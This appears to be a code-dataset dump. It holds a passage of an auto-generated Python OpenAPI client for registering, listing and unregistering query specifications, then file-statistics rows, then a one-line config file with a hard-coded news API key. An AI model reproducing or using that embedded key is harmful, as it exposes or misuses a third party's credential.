"""Retrieve detailed information for a query specification # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_query_details(query_fqn, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str query_fqn: Fully qualified name of the query (package name and query name separated with a dot) (required)
:return: QuerySpecificationResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_query_details_with_http_info(query_fqn, **kwargs) # noqa: E501
else:
(data) = self.get_query_details_with_http_info(query_fqn, **kwargs) # noqa: E501
return data
def get_query_details_with_http_info(self, query_fqn, **kwargs): # noqa: E501
"""Retrieve detailed information for a query specification # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_query_details_with_http_info(query_fqn, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str query_fqn: Fully qualified name of the query (package name and query name separated with a dot) (required)
:return: QuerySpecificationResponse
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['query_fqn'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_query_details" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'query_fqn' is set
if ('query_fqn' not in local_var_params or
local_var_params['query_fqn'] is None):
raise ValueError("Missing the required parameter `query_fqn` when calling `get_query_details`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
if 'query_fqn' in local_var_params:
query_params.append(('queryFQN', local_var_params['query_fqn'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['basicAuth'] # noqa: E501
return self.api_client.call_api(
'/queries.details', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='QuerySpecificationResponse', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def list_queries(self, **kwargs): # noqa: E501
"""List registered query specifications # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_queries(async_req=True)
>>> result = thread.get()
:param async_req bool
:return: QueryListResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.list_queries_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.list_queries_with_http_info(**kwargs) # noqa: E501
return data
def list_queries_with_http_info(self, **kwargs): # noqa: E501
"""List registered query specifications # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_queries_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:return: QueryListResponse
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method list_queries" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['basicAuth'] # noqa: E501
return self.api_client.call_api(
'/queries.list', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='QueryListResponse', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def register_queries(self, query_definition_request, **kwargs): # noqa: E501
"""Register query definitions # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.register_queries(query_definition_request, async_req=True)
>>> result = thread.get()
:param async_req bool
:param QueryDefinitionRequest query_definition_request: (required)
:return: QueryFQNList
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.register_queries_with_http_info(query_definition_request, **kwargs) # noqa: E501
else:
(data) = self.register_queries_with_http_info(query_definition_request, **kwargs) # noqa: E501
return data
def register_queries_with_http_info(self, query_definition_request, **kwargs): # noqa: E501
"""Register query definitions # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.register_queries_with_http_info(query_definition_request, async_req=True)
>>> result = thread.get()
:param async_req bool
:param QueryDefinitionRequest query_definition_request: (required)
:return: QueryFQNList
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['query_definition_request'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method register_queries" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'query_definition_request' is set
if ('query_definition_request' not in local_var_params or
local_var_params['query_definition_request'] is None):
raise ValueError("Missing the required parameter `query_definition_request` when calling `register_queries`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'query_definition_request' in local_var_params:
body_params = local_var_params['query_definition_request']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['basicAuth'] # noqa: E501
return self.api_client.call_api(
'/queries.register', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='QueryFQNList', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def register_queries_from_model_compartment(self, model_compartment, **kwargs): # noqa: E501
"""Registers query definitions contained in model compartments. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.register_queries_from_model_compartment(model_compartment, async_req=True)
>>> result = thread.get()
:param async_req bool
:param ModelCompartment model_compartment: Model compartment descriptor. (required)
:return: QueryListResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.register_queries_from_model_compartment_with_http_info(model_compartment, **kwargs) # noqa: E501
else:
(data) = self.register_queries_from_model_compartment_with_http_info(model_compartment, **kwargs) # noqa: E501
return data
def register_queries_from_model_compartment_with_http_info(self, model_compartment, **kwargs): # noqa: E501
"""Registers query definitions contained in model compartments. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.register_queries_from_model_compartment_with_http_info(model_compartment, async_req=True)
>>> result = thread.get()
:param async_req bool
:param ModelCompartment model_compartment: Model compartment descriptor. (required)
:return: QueryListResponse
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['model_compartment'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method register_queries_from_model_compartment" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'model_compartment' is set
if ('model_compartment' not in local_var_params or
local_var_params['model_compartment'] is None):
raise ValueError("Missing the required parameter `model_compartment` when calling `register_queries_from_model_compartment`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'model_compartment' in local_var_params:
body_params = local_var_params['model_compartment']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['basicAuth'] # noqa: E501
return self.api_client.call_api(
'/queries.registerFromModelCompartment', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='QueryListResponse', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def register_queries_plain_text(self, body, **kwargs): # noqa: E501
"""Register query definitions in plain text format # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.register_queries_plain_text(body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str body: Query definition in plain text (required)
:param str query_package: Optional query package for organizing queries and controlling visibility. The value must be a legal Java package name: * start with lowercase letter * contain only lowercase letters, digits and dots ('.') * cannot end with dot ('.')
:param str query_language: Optional parameter for defining the query language. Default value is 'viatra'. Choose one of the followings: viatra, lucene
:return: QueryFQNList
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.register_queries_plain_text_with_http_info(body, **kwargs) # noqa: E501
else:
(data) = self.register_queries_plain_text_with_http_info(body, **kwargs) # noqa: E501
return data
def register_queries_plain_text_with_http_info(self, body, **kwargs): # noqa: E501
"""Register query definitions in plain text format # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.register_queries_plain_text_with_http_info(body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str body: Query definition in plain text (required)
:param str query_package: Optional query package for organizing queries and controlling visibility. The value must be a legal Java package name: * start with lowercase letter * contain only lowercase letters, digits and dots ('.') * cannot end with dot ('.')
:param str query_language: Optional parameter for defining the query language. Default value is 'viatra'. Choose one of the followings: viatra, lucene
:return: QueryFQNList
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['body', 'query_package', 'query_language'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method register_queries_plain_text" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'body' is set
if ('body' not in local_var_params or
local_var_params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `register_queries_plain_text`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
if 'query_package' in local_var_params:
query_params.append(('queryPackage', local_var_params['query_package'])) # noqa: E501
if 'query_language' in local_var_params:
query_params.append(('queryLanguage', local_var_params['query_language'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in local_var_params:
body_params = local_var_params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['text/plain']) # noqa: E501
# Authentication setting
auth_settings = ['basicAuth'] # noqa: E501
return self.api_client.call_api(
'/queries.registerPlainText', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='QueryFQNList', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def unregister_all_queries(self, **kwargs): # noqa: E501
"""Unregister all queries # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.unregister_all_queries(async_req=True)
>>> result = thread.get()
:param async_req bool
:return: SimpleMessage
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.unregister_all_queries_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.unregister_all_queries_with_http_info(**kwargs) # noqa: E501
return data
def unregister_all_queries_with_http_info(self, **kwargs): # noqa: E501
"""Unregister all queries # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.unregister_all_queries_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:return: SimpleMessage
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method unregister_all_queries" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['basicAuth'] # noqa: E501
return self.api_client.call_api(
'/queries.unregisterAll', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='SimpleMessage', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
| 40.752492
| 268
| 0.635674
| 2,807
| 24,533
| 5.253652
| 0.074457
| 0.043399
| 0.064556
| 0.029294
| 0.923645
| 0.910626
| 0.900183
| 0.892046
| 0.871025
| 0.85041
| 0
| 0.014179
| 0.281295
| 24,533
| 601
| 269
| 40.8203
| 0.822198
| 0.332654
| 0
| 0.744548
| 1
| 0
| 0.17712
| 0.05332
| 0
| 0
| 0
| 0
| 0
| 1
| 0.040498
| false
| 0
| 0.012461
| 0
| 0.11215
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
0f5cae9b8c5dde7b9d0cb90e744f13dc4e8a3f7d
| 49
|
py
|
Python
|
instance/config.py
|
Faihope/News
|
4d8ca790b10f6e52ddefc0bcd00ac2fe188d5bfa
|
[
"MIT"
] | null | null | null |
instance/config.py
|
Faihope/News
|
4d8ca790b10f6e52ddefc0bcd00ac2fe188d5bfa
|
[
"MIT"
] | null | null | null |
instance/config.py
|
Faihope/News
|
4d8ca790b10f6e52ddefc0bcd00ac2fe188d5bfa
|
[
"MIT"
] | null | null | null |
NEWS_API_KEY = '827e6ae4f3574bf2b3726cac9e755d63'
| 49
| 49
| 0.897959
| 4
| 49
| 10.5
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.425532
| 0.040816
| 49
| 1
| 49
| 49
| 0.468085
| 0
| 0
| 0
| 0
| 0
| 0.64
| 0.64
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.